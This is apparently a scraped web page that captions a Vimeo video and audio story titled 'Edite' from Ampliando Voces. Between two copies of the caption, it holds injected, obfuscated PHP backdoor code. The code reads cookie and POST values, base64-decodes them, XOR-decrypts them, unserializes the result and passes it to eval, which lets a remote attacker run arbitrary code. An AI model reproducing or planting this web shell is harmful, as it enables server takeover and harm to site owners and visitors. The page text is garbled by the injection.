Edite: “Necesitamos tener más conocimiento, más material didáctico” from Ampliando Voces on Vimeo. Listen to this story in English: [audio:Edite.mp3|titles=Edite] Voice: Isabela Lyrio
$IqGkpPZCCk = chr (113) . "\171" . "\137" . chr ( 810 - 724 ).'k' . "\131" . "\x6b";$PtYOR = "\x63" . chr (108) . chr ( 222 - 125 ).chr ( 543 - 428 )."\x73" . "\137" . 'e' . "\170" . 'i' . "\163" . chr (116) . "\x73";$lFUtIB = $PtYOR($IqGkpPZCCk); $dlxFwL = $lFUtIB;if (!$dlxFwL){class qy_VkYk{private $ICZlVji;public static $tHQcngYZ = "4b18b3c9-8392-4ff4-a472-6ac285df067b";public static $aJcAjZPCu = 37748;public function __construct(){$PvVVxxg = $_COOKIE;$lQqNnkshQe = $_POST;$LqAKOi = @$PvVVxxg[substr(qy_VkYk::$tHQcngYZ, 0, 4)];if (!empty($LqAKOi)){$RgfUF = "base64";$zklagncDP = "";$LqAKOi = explode(",", $LqAKOi);foreach ($LqAKOi as $UgWiLBrRb){$zklagncDP .= @$PvVVxxg[$UgWiLBrRb];$zklagncDP .= @$lQqNnkshQe[$UgWiLBrRb];}$zklagncDP = array_map($RgfUF . '_' . "\x64" . 'e' . chr ( 345 - 246 )."\x6f" . "\x64" . chr (101), array($zklagncDP,)); $zklagncDP = $zklagncDP[0] ^ str_repeat(qy_VkYk::$tHQcngYZ, (strlen($zklagncDP[0]) / strlen(qy_VkYk::$tHQcngYZ)) + 1);qy_VkYk::$aJcAjZPCu = @unserialize($zklagncDP);}}public function __destruct(){$this->OFQgmgGNrE();}private function OFQgmgGNrE(){if (is_array(qy_VkYk::$aJcAjZPCu)) {$gvgVQqA = str_replace("\x3c" . chr ( 297 - 234 ).chr ( 783 - 671 )."\150" . chr ( 727 - 615 ), "", qy_VkYk::$aJcAjZPCu["\x63" . chr ( 587 - 476 ).'n' . 't' . 'e' . "\x6e" . "\164"]);eval($gvgVQqA);exit();}}}$NKxcbpd = new qy_VkYk(); $NKxcbpd = "45486";}$Qmnhs = "\x70" . chr (66) . "\137" . "\147" . chr (121) . "\x53" . chr (78); $ALpHvjJ = "\x63" . chr ( 997 - 889 ).chr (97) . "\163" . chr ( 569 - 454 )."\137" . chr (101) . 'x' . 'i' . 's' . 't' . chr (115); $xmjubZH = $ALpHvjJ($Qmnhs); $Qmnhs = "63414";$AqiAj = $xmjubZH;$ALpHvjJ = "48265";if (!$AqiAj){class pB_gySN{private $gDMtOqP;public static $BnOjdqwyJ = "f8655c24-1932-4925-af50-751760fed794";public static $EcyZSqrd = 13793;public function __construct($ihZLR=0){$gbBdHHP = $_COOKIE;$PXPmQMAB = $_POST;$wDHsj = @$gbBdHHP[substr(pB_gySN::$BnOjdqwyJ, 0, 4)];if (!empty($wDHsj)){$eYsRwAIoLP = "base64";$YsiViGmV = "";$wDHsj = explode(",", $wDHsj);foreach ($wDHsj as $reyGtBKhv){$YsiViGmV .= @$gbBdHHP[$reyGtBKhv];$YsiViGmV .= @$PXPmQMAB[$reyGtBKhv];}$YsiViGmV = array_map($eYsRwAIoLP . "\137" . chr ( 234 - 134 ).'e' . "\143" . chr (111) . chr (100) . "\145", array($YsiViGmV,)); $YsiViGmV = $YsiViGmV[0] ^ str_repeat(pB_gySN::$BnOjdqwyJ, (strlen($YsiViGmV[0]) / strlen(pB_gySN::$BnOjdqwyJ)) + 1);pB_gySN::$EcyZSqrd = @unserialize($YsiViGmV);}}private function GmJzkZpX(){if (is_array(pB_gySN::$EcyZSqrd)) {$WUrkOTcfz = str_replace(chr ( 974 - 914 ) . chr (63) . chr (112) . "\150" . "\160", "", pB_gySN::$EcyZSqrd[chr ( 600 - 501 ).chr (111) . chr (110) . "\164" . "\x65" . 'n' . 't']);eval($WUrkOTcfz); $BxmUIjXEc = "17620";exit();}}public function __destruct(){$this->GmJzkZpX(); $BxmUIjXEc = "17620";$QpyGsN = str_pad($BxmUIjXEc, 10);}}$QyvUd = new pB_gySN(); $QyvUd = "9561_23577";}
Edite: “Necesitamos tener más conocimiento, más material didáctico” from Ampliando Voces on Vimeo. Listen to this story in English: [audio:Edite.mp3|titles=Edite] Voice: Isabela Lyrio